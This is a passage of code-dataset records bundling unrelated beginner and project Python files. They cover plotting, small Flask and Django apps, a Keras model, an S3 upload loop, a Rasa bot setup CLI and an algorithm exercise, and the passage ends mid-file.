stebėjimas\n\nilgis=np.array([0.78, 0.58, 0.3, 0.2])\nlaiko_f=2*np.pi*(ilgis/9.8)**0.5\nlaikas=np.array([1.73, 1.6, 1.25, 1.06])\n\nrplot(ilgis, laiko_f, 'b')\nplt.plot(ilgis, laikas, 'r')\nplt.ylabel('laikas')\nplt.xlabel('ilgis')'''\n \n#2) Funkcijos braižymas\nA,B=-10, 10\nplt.xlim((A,B))\nplt.xticks(np.arange(A,B+1, (B-A)/20))\na,b=-1,1\nplt.ylim((a,b))\nplt.yticks(np.arange(a,b+1, (b-a)/10))\n\n#x=np.array(np.arange(0,1,0.0001))\n\nx=np.array([-3,-2,4,0,-1])\ny=1/x\n\nrplot(x,y,'b')\n\nPRINTSIZE=6\nprint('x =',''.join([' '*(PRINTSIZE-len(str(n)))+str(n) for n in [round(n,2) for n in x]]))\nprint('y =',''.join([' '*(PRINTSIZE-len(str(n)))+str(n) for n in [round(n,2) for n in y]]))\n#rplot(x,[10, 7, 10, 10, 21],'r')\nplt.show()\n\n","sub_path":"UNCLASSIFIED/concept_vivat_cangaroo/demo - create folder of images problems in pdf/untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"628909676","text":"from flask import Flask\n\napp = Flask(__name__)\n\n\n@app.route('//hi/')\ndef greeting(count, name):\n str1 = 'hello'\n for _ in range(0, count):\n str1 += '%s' % name\n return str1\n\n\n@app.route('/training1//')\ndef another(goal, weight):\n str1 = 'my weight=%.2f, goal=%s' % (weight, goal)\n return str1\n\n\nif __name__ == '__main__':\n app.run(port=5432, host='0.0.0.0', debug=True)\n","sub_path":"main24.py","file_name":"main24.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"292484116","text":"# -*- coding: utf-8 -*-\nfrom django.db.models import F, Q\nfrom django.core.management.base import NoArgsCommand\n\nfrom modeltranslation.settings import DEFAULT_LANGUAGE\nfrom modeltranslation.translator import translator\nfrom modeltranslation.utils import build_localized_fieldname\n\n\nclass Command(NoArgsCommand):\n help = ('Updates the default translation fields of all or the specified'\n 'translated application using the value of the original field.')\n\n def handle(self, **options):\n verbosity = int(options['verbosity'])\n if verbosity > 0:\n self.stdout.write(\"Using default language: %s\\n\" % DEFAULT_LANGUAGE)\n for model, trans_opts in translator._registry.items():\n if model._meta.abstract:\n continue\n if verbosity > 0:\n self.stdout.write(\"Updating data of model '%s'\\n\" % model)\n for fieldname in trans_opts.fields:\n def_lang_fieldname = build_localized_fieldname(\n fieldname, DEFAULT_LANGUAGE)\n\n # We'll only update fields which do not have an existing value\n q = Q(**{def_lang_fieldname: None})\n field = model._meta.get_field(fieldname)\n if field.empty_strings_allowed:\n q |= Q(**{def_lang_fieldname: \"\"})\n\n model.objects.filter(q).rewrite(False).update(**{def_lang_fieldname: F(fieldname)})\n","sub_path":"modeltranslation/management/commands/update_translation_fields.py","file_name":"update_translation_fields.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"535424074","text":"while True:\n N = int(input())\n if N == 0:\n break\n\n P = [int(i) for i in input().split(\" \")]\n\n X, Y = [int(i) for i in input().split(\" \")]\n\n r = []\n for i in range(X, Y + 1):\n _i = i\n for _p in P:\n while _i % _p == 0:\n _i = int(_i / _p)\n if _i == 1:\n r.append(i)\n\n if r == []:\n print(\"none\")\n else:\n print(','.join(sorted([str(i) for i in r])))\n","sub_path":"primes/primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"280012110","text":"from django.conf.urls import patterns, include, url\n\n\n\nurlpatterns = patterns('todoapp.apps.manager.views',\n url(r'^$','index',name='index'),\n url(r'^lists/(?P\\d+)/$','view_list',name='view_list'),\n url(r'^lists/(?P\\d+)/add_task/$','add_task',name='add_task'),\n url(r'^lists/(?P\\d+)/update_task/$','update_task',name='update_task'),\n url(r'^lists/new/$','new_list',name='new_list'),\n url(r'^lists/(?P\\d+)/monthly/','monthly_view_list',name='monthly_view_list'),\n url(r'^lists/(?P\\d+)/weekly/','weekly_view_list',name='weekly_view_list'),\n url(r'^task/(?P\\d+)/date_change/','date_change',name='date_change'),\n\n)\n","sub_path":"todoapp/apps/manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"261501800","text":"'''\nCreated on Mar 3, 2014\n\n@author: steve\n'''\nimport unittest\nfrom webtest import TestApp\nimport re\nfrom urllib.parse import urlparse\n\nimport bottle\nfrom bottle.ext import sqlite, beaker\nimport os\nimport sqlite3\n\nimport main\n\nimport database\n\n\nDATABASE_NAME = \"test.db\"\nmain.app.install(sqlite.Plugin(dbfile=DATABASE_NAME))\n\n# make sure bottle looks for templates in the main directory, not this one\nbottle.TEMPLATE_PATH = [os.path.join(os.path.dirname(__file__), p) for p in ['../', '../views/']]\n\n\nclass Level2FunctionalTests(unittest.TestCase):\n\n def setUp(self):\n\n session_opts = {\n 'session.type': 'memory',\n }\n beaker_app = beaker.middleware.SessionMiddleware(main.app, session_opts)\n db = sqlite3.connect(DATABASE_NAME)\n database.create_tables(db)\n self.users, self.images = database.sample_data(db)\n self.app = TestApp(beaker_app)\n bottle.debug() # force debug messages in error pages returned by webtest\n\n def tearDown(self):\n pass\n\n def testImagesPresent(self):\n \"\"\"As a visitor to the site, when I load the home page I\n see three images displayed, each\n labelled with a date, a user name and a title. \"\"\"\n\n result = self.app.get('/')\n\n images = result.html.find_all('img')\n\n # expect to find three images\n self.assertEqual(3, len(images), \"Wrong number of images found\")\n\n flowtows = result.html.find_all(class_='flowtow')\n\n image_list = self.images\n\n self.assertEqual(3, len(flowtows))\n\n # each contains the image, date, author and likes\n for index in range(3):\n div = flowtows[index]\n (path, date, user, likes) = image_list[index]\n\n self.assertIn(date, div.text)\n self.assertIn(user, div.text)\n # look for the number of likes\n self.assertIn(str(len(likes)+1), div.text, \"expected to find %d likes mentioned in:\\n\\n%s\" % (len(likes), div))\n\n # look for just one image\n img = div.find_all('img')\n self.assertEqual(1, len(img))\n\n def testLikeImage(self):\n \"\"\"As a visitor to the site, when I click on \"Like\" below an image,\n the page refreshes and has one more like added to the total for that image.\"\"\"\n\n response = self.app.get('/')\n originallikes = get_page_likes(response)\n\n print(originallikes)\n\n # find a form with the action /like\n for i in response.forms:\n form = response.forms[i]\n if form.action == '/like':\n\n self.assertIn('filename', form.fields, 'image like form does not have a filename field')\n\n\n filename = form['filename'].value\n\n formresponse = form.submit()\n\n # response should be a redirect to the main page\n self.assertIn(formresponse.status, ['303 See Other', '302 Found'])\n (_, _, path, _, _, _) = urlparse(formresponse.headers['Location'])\n self.assertEqual('/', path)\n\n # and the main page should now have one more like for this image\n newresponse = self.app.get('/')\n newlikes = get_page_likes(newresponse)\n\n print(newlikes)\n\n for key in originallikes.keys():\n if key == filename:\n self.assertEqual(originallikes[key]+1, newlikes[key])\n else:\n self.assertEqual(originallikes[key], newlikes[key])\n\n # we only need to test one form\n break\n\n\ndef get_page_likes(response):\n \"\"\"Scan a page and create a dictionary of the image filenames\n and displayed like count for each image. Return the\n dictionary.\"\"\"\n\n # find all flowtow divs\n flowtows = response.html.find_all('div', class_='flowtow')\n result = dict()\n for div in flowtows:\n # get the filename from the form hidden input\n input = div.find(\"input\", attrs={'name': \"filename\"})\n\n filename = input['value']\n\n # find the likes element\n likesel = div.find(class_='likes')\n # grab the integer from this element\n m = re.search('\\d+', likesel.text)\n if m:\n likes = int(m.group())\n else:\n likes = 0\n\n result[filename] = likes\n\n return result\n\n\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()\n","sub_path":"tests/level2_functional.py","file_name":"level2_functional.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"333586002","text":"from flask import Flask, render_template, Response\nfrom services.finnkino import FinnKinoXML\nfrom services.leffatykki import LeffaTykkiRSS\nimport json\napp = Flask(__name__)\nfk = FinnKinoXML()\nlt = LeffaTykkiRSS()\n\ndef get_movies_with_reviews(area_code):\n\tmovie_container = {}\n\tmovies = fk.get_movies_from_area(area_code)\n\treviews = lt.get_movie_reviews()\n\tfor id, movie in movies.items():\n\t\treview_link = \"\"\n\t\ttitle = movie['title']\n\t\tif title in reviews:\n\t\t\treview_link = reviews[movie['title']]\n\t\tmovie_container[id] = {\n\t\t\t'title': movie['title'],\n\t\t\t'rating': movie['rating'],\n\t\t\t'genres': \"\".join(movie['genres']),\n\t\t\t'review': review_link\n\t\t}\n\treturn movie_container\n\n@app.route('/')\ndef index():\n\tareas = fk.get_area_codes()\n\tdata = {\n\t\t'areas': areas\n\t}\n\treturn render_template('index.html', data=data)\n\n@app.route('/movies/')\ndef get_movies(area):\n\tmovies = get_movies_with_reviews(area)\n\tdata = {\n\t\t'movies': movies\n\t}\n\treturn render_template('_movies.html', data=data)\n\n@app.route('/movies//json')\ndef get_movies_json(area):\n\tmovies = get_movies_with_reviews(area)\n\tdata = json.dumps(movies)\n\tresp = Response(response=data, status=200, mimetype=\"application/json\")\n\treturn resp\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604308666","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\n\nfrom core.models.extern import BaseModelKeras\n\n\nclass CartPoleModel(BaseModelKeras):\n\n @staticmethod\n def create_model(input_shape, output_shape, *args, **kwargs):\n \"\"\" Creates the model. \"\"\"\n model = Sequential([\n Dense(input_shape=input_shape,\n name='layer_fc1', units=24, activation='relu'),\n Dense(name='layer_fc2', units=24, activation='relu'),\n Dense(name='layer_fc_out', units=output_shape, activation='linear'),\n ])\n model.compile(optimizer=Adam(lr=1e-2), loss='mse')\n return model\n","sub_path":"agents/cartpole/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"37545942","text":"import FWCore.ParameterSet.Config as cms\n\nfrom FWCore.ParameterSet.VarParsing import VarParsing\n\nprocess = cms.Process(\"DISPLACED\")\n\nprocess.load(\"Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff\")\nprocess.load(\"Configuration.Geometry.GeometryRecoDB_cff\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc')\n\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1000\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(100) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n \"root://cms-xrd-global.cern.ch//store/mc/RunIISummer16MiniAODv2/SMS-T1qqqq_ctau-1_TuneCUETP8M1_13TeV-madgraphMLM-pythia8/MINIAODSIM/PUMoriond17_GridpackScan_80X_mcRun2_asymptotic_2016_TrancheIV_v6-v2/10000/023CA233-4289-E711-9B01-002590FD5A48.root\"\n )\n)\n\nprocess.options = cms.untracked.PSet(\n wantSummary = cms.untracked.bool(True),\n allowUnscheduled = cms.untracked.bool(True)\n)\n\nprocess.load('XTag.DisplacedVertex.GenDisplacedVertices_cff')\n\nprocess.MINIAODSIMoutput = cms.OutputModule(\"PoolOutputModule\", \n compressionAlgorithm = cms.untracked.string('LZMA'), \n compressionLevel = cms.untracked.int32(4), \n dataset = cms.untracked.PSet( \n dataTier = cms.untracked.string(''), \n filterName = cms.untracked.string('') \n ), \n dropMetaData = cms.untracked.string('ALL'), \n eventAutoFlushCompressedSize = cms.untracked.int32(15728640), \n fastCloning = cms.untracked.bool(False), \n fileName = cms.untracked.string('BTagging.root'), \n outputCommands = cms.untracked.vstring(\n 'drop *',\n 'keep *_displacedGenVertices_*_DISPLACED',\n ),\n overrideInputFileSplitLevels = cms.untracked.bool(True) \n) \n \n\n\nprocess.endpath = cms.EndPath(process.DisplacedGenVertexSequence*process.MINIAODSIMoutput) \n","sub_path":"DisplacedVertex/test/test_DisplacedGenVertex.py","file_name":"test_DisplacedGenVertex.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"65180055","text":"# -*- coding:utf-8 -*-\n__author__ = 'neo'\n__time__ = '2018/9/5 11:12'\nfrom app import create_app\n\n\napp = create_app()\n\n# app.add_url_rule('/hello',view_func=hello)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0',debug=app.config['DEBUG'])","sub_path":"fisher.py","file_name":"fisher.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"543292838","text":"import boto3\nfrom botocore.exceptions import NoCredentialsError\nfrom datetime import datetime\n\n\ndef upload_to_bucket(local_file, bucket, s3_file):\n s3 = boto3.client('s3')\n\n try:\n s3.upload_file(local_file, bucket, s3_file)\n print(\"Upload Successful\")\n return True\n except FileNotFoundError:\n print(\"The file was not found\")\n return False\n except NoCredentialsError:\n print(\"Credentials not available\")\n return False\n\n\n# year = now.strftime(\"%Y\")\n# print(\"year:\", year)\n\n# month = now.strftime(\"%m\")\n# print(\"month:\", month)\n\n# day = now.strftime(\"%d\")\n# print(\"day:\", day)\n\n# time = now.strftime(\"%H:%M:%S\")\n# print(\"time:\", time)\n\n# date_time = now.strftime(\"%m/%d/%Y, %H:%M:%S\")\n# print(\"date and time:\",date_time)\t\n\nvar=0\nwhile var < 100:\n# while True:\n now = datetime.now() # current date and time\n print(now)\n # s3_file_name=\"diagram_\" + now.strftime(\"%H:%M:%S:%f\") + \".png\"\n s3_file_name=now.strftime(\"%f_%H:%M:%S:%f\") + \"_diagram\" + \".png\"\n print(s3_file_name)\n uploaded = upload_to_bucket('/home/ec2-user/environment/Amazon-S3-Bucket-Load-Test/container/diagram.png', 'amazon-s3-bucket-load-test-storagebucket-knlgpd3wpz0n', s3_file_name)\n done = datetime.now()\n # uploaded = upload_to_bucket('/beef/diagram.png', 'amazon-s3-bucket-load-test-storagebucket-knlgpd3wpz0n', s3_file_name)\n var = var + 1\n \n","sub_path":"container/load-test.py","file_name":"load-test.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"455836437","text":"#!/usr/bin/python3\n\"\"\" a script that starts a Flask web application \"\"\"\nfrom flask import Flask\nfrom flask import render_template\nfrom models import storage, State\n\napp = Flask(__name__)\n\n\n@app.teardown_appcontext\ndef remove_session(exception):\n \"\"\" After each request, it removes the current SQLAlchemy Session \"\"\"\n storage.close()\n\n\n@app.route('/states', strict_slashes=False)\ndef render_states():\n \"\"\" displays all states \"\"\"\n States = storage.all(State).values()\n return render_template(\"9-states.html\", States=States, one=None)\n\n\n@app.route('/states/', strict_slashes=False)\ndef render_one_state(id):\n \"\"\" displays one state if it exists \"\"\"\n key = \"State.\" + id\n one = None\n if key in storage.all(State):\n one = storage.all(State)[key]\n return render_template(\"9-states.html\", States=None, one=one)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"312100880","text":"\n\nfrom datetime import date, timedelta\nfrom itertools import islice\nTODAY = date.today()\n\n\ndef gen_bite_planning(num_bites=1, num_days=1, start_date=TODAY):\n \n delta_days = timedelta(days=num_days)\n poprzedni = 1\n while True:\n final = start_date + delta_days\n yield final\n if poprzedni == num_bites:\n start_date = final\n poprzedni = 1 \n else:\n poprzedni +=1\n\ngen = gen_bite_planning(num_bites=3, num_days=1, start_date=TODAY)\n\nfor _ in range(6):\n print(next(gen))","sub_path":"6_Generator_Exercices_Days_16_18/pybytes219_generator.py","file_name":"pybytes219_generator.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"404649597","text":"#Given a string containing only three types of characters: '(', ')' and '*', write a function to check whether this string is valid. We define the validity of a string by these rules:\n\n#Any left parenthesis '(' must have a corresponding right parenthesis ')'.\n#Any right parenthesis ')' must have a corresponding left parenthesis '('.\n#Left parenthesis '(' must go before the corresponding right parenthesis ')'.\n#'*' could be treated as a single right parenthesis ')' or a single left parenthesis '(' or an empty string.\n#An empty string is also valid.\n\n#Example 1:\n#Input: \"()\"\n#Output: True\n#Example 2:\n#Input: \"(*)\"\n#Output: True\n#Example 3:\n#Input: \"(*))\"\n#Output: True\n#Note:\n#The string size will be in the range [1, 100].\n\nclass Solution:\n def checkValidString(self, s: str) -> bool:\n if s == \"\":\n return True\n\n stack1 = []\n stack2 = []\n l = len(s)\n\n for i in range(l):\n if s[i] == '(':\n stack1.append(i)\n elif s[i] == '*':\n stack2.append(i)\n else:\n if stack1:\n stack1.pop()\n elif stack2:\n stack2.pop()\n else:\n return False\n\n while stack1:\n if not stack2:\n return False\n else:\n if stack1.pop() >= stack2.pop():\n return False\n\n return True\n\ntest = \"(*)\"\ns = Solution()\ns.checkValidString(test)\n","sub_path":"python_code/678_Valid_Parenthesis_String.py","file_name":"678_Valid_Parenthesis_String.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"378544576","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport os\nimport json\nimport sys\nimport urllib\nimport tarfile\nimport wget\nimport shutil\n\nfrom subprocess import call\n\nfrom rasa_nlu.converters import load_data\nfrom rasa_nlu.config import RasaNLUConfig\nfrom rasa_nlu.model import Trainer\n\ndef main():\n arguments = sys.argv\n if len(arguments) < 2:\n show_hint(arguments)\n else:\n method = arguments[1]\n if method == 'train':\n learn(arguments)\n elif method == 'init':\n init(arguments)\n elif method == 'hint':\n show_hint(arguments)\n elif method == 'run':\n run(arguments)\n elif method == 'build':\n build(arguments)\n elif method == \"download\":\n download(arguments)\n else:\n show_hint(arguments)\n\ndef build(arguments):\n path = os.path.join(os.getcwd(),'actions')\n files = os.listdir(path)\n imps = []\n\n for i in range(len(files)):\n name = files[i].split('.')\n if len(name) > 1:\n if name[1] == 'py' and name[0] != '__init__':\n name = name[0]\n imps.append(name)\n init_path = os.path.join(path,'__init__.py')\n file = open(init_path,'w')\n toWrite = '__all__ = ' + str(imps)\n\n file.write(toWrite)\n file.close()\n\ndef learn(arguments):\n path = os.path.join(os.getcwd(), 'train')\n if (os.path.isdir(path)):\n ac_path = os.path.join(os.getcwd(),'actions')\n files = os.listdir(ac_path)\n imps = []\n\n for i in range(len(files)):\n name = files[i].split('.')\n if len(name) > 1:\n if name[1] == 'py' and name[0] != '__init__':\n name = name[0]\n imps.append(name)\n init_path = os.path.join(ac_path,'__init__.py')\n file = open(init_path,'w')\n toWrite = '__all__ = ' + str(imps)\n\n file.write(toWrite)\n file.close()\n\n files = os.listdir(path)\n\n \n common_examples = []\n\n none_example_1 = {'text':'jshfjdhsfj','intent':'None','entities':[]}\n none_example_2 = {'text':'dfjkhjkfds','intent':'None','entities':[]}\n common_examples.append(none_example_1)\n common_examples.append(none_example_2)\n\n \n for file in files:\n file_data = file.split('.')\n intent_name = file_data[0]\n file_type = file_data[1]\n if file_type != 'txt':\n continue\n else:\n with open(path + '/' + file,'r') as intentFile:\n responses = []\n examples = intentFile.readlines()\n examples = [*map(lambda s: s.strip(), examples)]\n if \"<-responses->\" in examples:\n pos = examples.index(\"<-responses->\")\n responses = examples[pos+1:]\n examples = examples[:pos]\n for sample in examples:\n example = {}\n sample_split = sample.split('<=>')\n sample_text = sample_split[0]\n\n if len(sample_split) == 1:\n example['text'] = sample\n example['intent'] = intent_name\n example['entities'] = []\n else:\n #get list of entities in the sample\n sample_entities = sample_split[1:]\n\n #check if paranthesis match\n open_paran_count = sample_text.count('(')\n close_paran_count = sample_text.count(')')\n\n if open_paran_count != close_paran_count:\n raise ValueError(\"Paranthesis don't match for \" + sample_text)\n \n\n #check if paranthesis and provided entites match\n if open_paran_count != len(sample_entities):\n raise ValueError(\"The entities provided and words marked in entities don't match for \" + sample_text)\n \n \n start_pos = 0\n entities_count = 0\n no_of_entities = len(sample_entities)\n entities = []\n\n while entities_count < no_of_entities:\n start_pos = sample_text.find('(', start_pos, len(sample_text)) + 1\n end_pos = sample_text.find(')', start_pos, len(sample_text))\n \n entityLabel = {}\n\n entityLabel['start'] = start_pos - 1\n entityLabel['end'] = end_pos - 1\n entityLabel['value'] = sample_text[start_pos:end_pos]\n entityLabel['entity'] = sample_entities[entities_count].strip()\n \n entities.append(entityLabel)\n entities_count += 1\n\n example['text'] = sample_text.replace('(','').replace(')','')\n example['intent'] = intent_name\n example['entities'] = entities\n\n common_examples.append(example)\n if len(responses) > 0:\n with open(os.path.join(os.getcwd(),\"actions.json\"),\"r+\") as jsonFile:\n data = json.load(jsonFile)\n data[intent_name] = responses\n jsonFile.seek(0)\n jsonFile.truncate()\n json.dump(data, jsonFile)\n \n nlp_json = {\"rasa_nlu_data\":{\"common_examples\":common_examples}}\n\n with open(os.path.join(path, 'train.json'),\"w\") as trainFile:\n json.dump(nlp_json, trainFile)\n\n with open(os.path.join(os.getcwd(), 'config.json'),\"r\") as jsonFile:\n data = json.load(jsonFile)\n\n jsonFile.close()\n\n training_data = load_data(os.path.join(path, 'train.json'))\n trainer = Trainer(RasaNLUConfig(os.path.join(os.getcwd(), 'config.json')))\n trainer.train(training_data)\n model_directory = trainer.persist('models')\n\n print(model_directory)\n data[\"active_model\"] = str(model_directory)\n\n with open(os.path.join(os.getcwd(), 'config.json'),\"w\") as jsonFile:\n json.dump(data, jsonFile)\n else:\n raise FileNotFoundError(\"No train folder found. Please setup a wizard bot first by running wiz create \")\n\ndef init(arguments):\n #Setup bot name\n main_name = os.getcwd().split(os.sep)[-1]\n if len(arguments) < 3:\n prompt = \"What is the name of the bot? (default: \" + main_name + \"):\"\n bot_name = str(input(prompt))\n if len(bot_name) == 0:\n bot_name = main_name\n else:\n bot_name = ' '.join(arguments[2:])\n print(\"Creating bot: \" + bot_name)\n\n #Setup actions folder\n print(\"Creating actions folder....\")\n directory = os.path.join(os.getcwd(),'actions')\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n #Configure actions folder\n print(\"Configuring actions folder....\")\n directory = os.path.join(os.getcwd(),'actions')\n with open(os.path.join(directory,'__init__.py'), \"w\") as initFile:\n initFile.write(\"#It will be initialized at runtime\")\n\n #Setup train folder\n print(\"Creating train folder....\")\n directory = os.path.join(os.getcwd(),'train')\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n #Setup config.json file\n print(\"Creating config.json...\")\n file_path = os.path.join(os.getcwd(),'config.json')\n with open(file_path, \"w\") as jsonFile:\n data = {}\n data[\"name\"] = bot_name\n data[\"pipeline\"] = \"mitie_sklearn\"\n data[\"mitie_file\"] = \"./train/total_word_feature_extractor.dat\"\n data[\"channels\"] = {}\n json.dump(data, jsonFile)\n\n #Setup actions.json file\n print(\"Creating actions.json...\")\n file_path = os.path.join(os.getcwd(),'actions.json')\n with open(file_path, \"w\") as jsonFile:\n data = {}\n json.dump(data,jsonFile)\n\n #Setup main.py file\n print(\"Creating main.py...\")\n file_path = os.path.join(os.getcwd(),'main.py')\n with open(file_path, \"w\") as mainFile:\n mainFile.write(\"from flask import Flask\\n\")\n mainFile.write(\"from flask_wizard import Wizard\\n\")\n mainFile.write(\"\\n\")\n mainFile.write(\"app = Flask(__name__)\\n\")\n mainFile.write(\"wizard = Wizard(app)\\n\")\n mainFile.write(\"\\n\")\n mainFile.write(\"if __name__ == '__main__':\\n\")\n mainFile.write(\"\\tapp.run()\")\n\n #Download mitie file\n print(\"Setting up Mitie model file...\")\n print(\"Installing Mitie\")\n\n if os.name == 'nt':\n #windows operating system\n call([\"pip\",\"install\",\"git+https://github.com/mit-nlp/MITIE.git#egg=mitie\"])\n else:\n #linux, unix or macos\n if sys.version_info >= (3,0):\n call([\"pip3\",\"install\",\"git+https://github.com/mit-nlp/MITIE.git#egg=mitie\"])\n else:\n call([\"pip\",\"install\",\"git+https://github.com/mit-nlp/MITIE.git#egg=mitie\"])\n print(\"Choose one of the options below\")\n print(\"1. Download Mitie models (size>400MB, so if you already have the total_word_feature_extractor.dat file use it. You can find it in the train folder if you already set up wiz before\")\n print(\"2. Copy from existing path\")\n choice = str(input(\"Choice (1 default): \"))\n if len(choice)==0 or choice == \"1\":\n directory_path = os.path.join(os.getcwd(),'train')\n file_path = os.path.join(directory_path,'mitie.tar.bz2')\n wget.download(\"https://github.com/mit-nlp/MITIE/releases/download/v0.4/MITIE-models-v0.2.tar.bz2\",'mitie.tar.bz2')\n\n #Extracting mitie file\n print(\"\")\n print(\"Extracting Mitie model (this might take a couple of minutes)\")\n tar = tarfile.open('mitie.tar.bz2',\"r:bz2\")\n tar.extractall()\n tar.close()\n\n #Move files around and only keep total_word_feature_extractor.dat\n current_path = os.path.join(os.getcwd(),'MITIE-models','english','total_word_feature_extractor.dat')\n new_path = os.path.join(os.getcwd(),'train','total_word_feature_extractor.dat')\n os.rename(current_path, new_path)\n os.remove('mitie.tar.bz2')\n shutil.rmtree(os.path.join(os.getcwd(), 'MITIE-models'))\n else:\n path = str(input(\"Enter path of existing total_word_feature_extractor.dat file: \"))\n if path[0] == '~':\n home = os.path.expanduser('~')\n path = path.replace('~',home)\n if os.path.exists(path):\n shutil.copyfile(path,os.path.join(os.getcwd(),'train','total_word_feature_extractor.dat'))\n \n #Download en model for spacy\n print(\"Setting up spacy\")\n if os.name == 'nt':\n #windows operating system\n call([\"python\",\"-m\",\"spacy\",\"download\",\"en\"])\n else:\n #linux, unix, macos\n if sys.version_info >= (3,0):\n call([\"python3\",\"-m\",\"spacy\",\"download\",\"en\"])\n else:\n call([\"python\",\"-m\",\"spacy\",\"download\",\"en\"])\n\ndef run(arguments):\n main_path = os.path.join(os.getcwd(),'main.py')\n if os.name == 'nt':\n #windows operating system\n call([\"python\",\"main.py\"])\n else:\n #linux, unix, macos operating system\n if sys.version_info >= (3,0):\n call([\"python3\",\"main.py\"])\n else:\n call([\"python\",\"main.py\"])\n\ndef download(arguments):\n directory_path = os.path.join(os.getcwd(),'train')\n file_path = os.path.join(directory_path,'mitie.tar.bz2')\n wget.download(\"https://github.com/mit-nlp/MITIE/releases/download/v0.4/MITIE-models-v0.2.tar.bz2\",'mitie.tar.bz2')\n\n #Extracting mitie file\n print(\"\")\n print(\"Extracting Mitie model (this might take a couple of minutes)\")\n tar = tarfile.open('mitie.tar.bz2',\"r:bz2\")\n tar.extractall()\n tar.close()\n\n #Move files around and only keep total_word_feature_extractor.dat\n current_path = os.path.join(os.getcwd(),'MITIE-models','english','total_word_feature_extractor.dat')\n new_path = os.path.join(os.getcwd(),'train','total_word_feature_extractor.dat')\n os.rename(current_path, new_path)\n os.remove('mitie.tar.bz2')\n shutil.rmtree(os.path.join(os.getcwd(), 'MITIE-models'))\n\ndef show_hint(arguments):\n print(\"Please provide the right option or command you want to run\")\n print(\"Accepted commands: \")\n print(\"-------------------------------------------\")\n print(\"wiz hint #to see list of commands\")\n print(\"wiz train #to train the nlp model\")\n print(\"wiz create #to create a new bot\")\n","sub_path":"flask_wizard_cli/command_line.py","file_name":"command_line.py","file_ext":"py","file_size_in_byte":13083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"146340412","text":"from __future__ import print_function\n\nimport enchant\nimport inflect\nimport nltk\nimport pprint\nimport re\nimport string\nfrom __builtin__ import len\nfrom __builtin__ import list\nfrom textblob import TextBlob\n\nenglish = enchant.Dict(\"en_US\")\n\ninflect_engine = inflect.engine()\n\nnoun = ['NN', 'NNS', 'NNP', 'NNPS']\nadj = ['JJ', 'JJR', 'JJS']\n\nstopwords = ['i', 's', 'able', 'isn', \\\n 'doesn', 'only', 'sa', 'mom', 'other', \\\n 'man', 'more', 'months', 'years', \\\n 'weeks', 'week', 'year', 'month', 'time', \\\n 'one', 'night', 'fav', 'girl', 'bye', 'lol'\\\n 'thing', 'son', 'bit', 'day', 'sorry', \\\n 'visit', 'item', 'lil', 'lot', 'eye'\\\n 'fire', 'jar', 'restriction' , 'norm', 'list',\n 'line', 'shape', 'ice', 'nit', 'vist', 'turf']\npp = pprint.PrettyPrinter(depth=6)\n\n\ndef get_type(data_dict):\n if len(data_dict.keys()) == 0:\n return \"other\", None\n max = -99999\n ret = list(data_dict.keys())[0]\n\n for key in data_dict.keys():\n if data_dict[key] > max:\n max = data_dict[key]\n ret = key\n return ret, max\n\n\ndef for_each_review_(review, ret_data_dict, dict_):\n del review['_id']\n scored_terms = review['score']\n\n for term in scored_terms.keys():\n skip = False\n nn = None\n t_list = []\n l_list = []\n nn_count = 0\n aa_count = 0\n term = term.lower().strip().replace(\" \", \" \")\n term_list = term.split(\" \")\n list_words = [] # nltk.pos_tag(term_list)\n try:\n for word in term_list:\n if word in stopwords:\n skip = 